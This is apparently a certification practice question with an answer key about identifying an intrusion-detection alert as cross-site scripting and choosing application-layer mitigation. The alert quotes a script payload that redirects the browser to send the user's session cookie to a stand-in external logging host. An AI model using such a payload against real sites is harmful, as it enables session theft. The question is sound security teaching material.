Question

Difficulty: MediumNetwork Security Monitoring and Alerting

A security administrator inspecting Network Intrusion Detection System (NIDS) alerts detects an HTTP POST request targeting an internal human resources portal. The recorded packet payload contains the string: `user=jdoe&token=<script>document.location='http://external-logger.net/collect?c='+document.cookie</script>`. Which of the following correctly identifies the vector shown in the alert and the proper security control response?

  1. Cross-Site Scripting (XSS); deploy a Web Application Firewall (WAF) or application-level sanitization to inspect and block malicious scripts.Answer
  2. B
    SQL Injection (SQLi); parameterize database queries to prevent malicious script strings from modifying database tables.
  3. C
    Cross-Site Scripting (XSS); reconfigure the out-of-band NIDS sensor to function inline so it can directly drop matching packets.
  4. D
    Cross-Site Scripting (XSS); reassign the internal web server to an isolated deception honeypot to capture and filter future attack payloads.

Answer

Cross-Site Scripting (XSS); deploy a Web Application Firewall (WAF) or application-level sanitization to inspect and block malicious scripts.
The recorded log string features script tags (`<script>`) designed to execute JavaScript in a target browser and exfiltrate session cookie data. This is a classic Cross-Site Scripting (XSS) payload. Because NIDS operates as a passive detective control, appropriate remediation requires application-aware protection such as input sanitization or a Web Application Firewall (WAF).

Step-by-Step Solution

1
Analyze the log payload structure
The payload includes JavaScript tags (`<script>...document.cookie...`) designed to steal session tokens via browser execution.
Identifying browser-executed script injection confirms the attack type as Cross-Site Scripting (XSS) rather than database manipulation (SQLi).
2
Evaluate control requirements for out-of-band NIDS alerts
Out-of-band NIDS provides detective alerting but cannot block active traffic inline.
Mitigating web application attack vectors requires application-layer defensive controls (such as WAF or input validation) rather than misconfiguring detective monitoring systems.

Key Concept

Identifying Cross-Site Scripting (XSS) payloads in network security monitoring logs and selecting application-layer mitigation controls.
Rate this question